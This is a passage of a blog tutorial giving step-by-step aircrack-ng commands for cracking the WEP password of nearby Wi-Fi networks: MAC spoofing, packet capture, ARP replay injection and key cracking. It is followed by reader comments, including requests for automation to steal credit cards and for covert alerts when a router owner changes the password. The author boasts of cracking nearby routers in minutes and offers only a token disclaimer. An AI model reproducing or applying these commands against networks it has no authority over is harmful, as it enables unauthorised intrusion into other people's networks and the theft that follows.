airmon-ng
airmon-ng stop ath0
ifconfig wifi0 down
macchanger –mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
Now you will see something like this:
Once you’ve decided on a network, take note of its channel number and bssid. The bssid will look something like this —
00:23:69:bb:2d:of
The Channel number will be under a heading that says “CH”.
airodump-ng -c (channel) -w (file name) –bssid (bssid) ath0
Once you type in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked “IV” with a number underneath it. This stands for “Initialization Vector” but in general terms all this means is “packets of info that contain characters of the password.” Once you gain a minimum of 5,000 of these IV’s, you can try to crack the password. I’ve cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made their password. The more difficult the password, the more packets you will need to crack it.
4. Cracking the WEP password
Leave this Konsole window up and running and open up a 2nd Konsole window.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0
Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0
Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password.
aircrack-ng -b (bssid) (filename)-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. You typically need to wait for 10,000 to 20,000 IV’s before it will crack. If this is the case, aircrack will test what you’ve got so far and then it will say something like “not enough IV’s. Retry at 10,000.”
If you did everything correctly up to this point, before too long you will have the password! Don’t worry if it looks a little strange, some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in. Sometimes the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. You can type in either one and it will connect you to the network.
se:cr:et
0F:KW:94:27:VF
It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will be very adept. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal activity falls completely on you because, technically, this is just for you to test the security of your own network.
Ravi says
Bro How To crack WPA , WPA2 Pass ….
?
i don’t have a Wordlist dictionary list…
spy Man says
Can you create a software on this so that it id done automatically. I need an easy way to get credit cards
DEV says
Hello sir, can I put email address in tenda router
So that I receive password when it changed by owner.
Anonymous says
is there any easier method (i mean which is simple to execute and there is no such complication)
Anonymous says
Thanx, i’ll try …. Sid
Anonymous says
Don’t u think mentioning MONITOR mode would be helpful? I mean it is necessary for this to work! Forget all this if you do not have a wifi card that is capable of monitor mode and utilizing the correct drivers. Use the LIVE DISK version of backtrack dont install it. AND TO THE GUY ABOVE SINCE WHEN DOES MEMORY = HARD DRIVE SPACE?? Go back to basic computers 101.
Anonymous says
Cd not insatlling properly bro…
Anonymous says
yes :(
sid says
Lokesh, buddy whenever i tried installing Backtrack3 CD it shows this error on cmd :
‘warning: not enough free memory’ while i have almost 40 gb free space on hard disk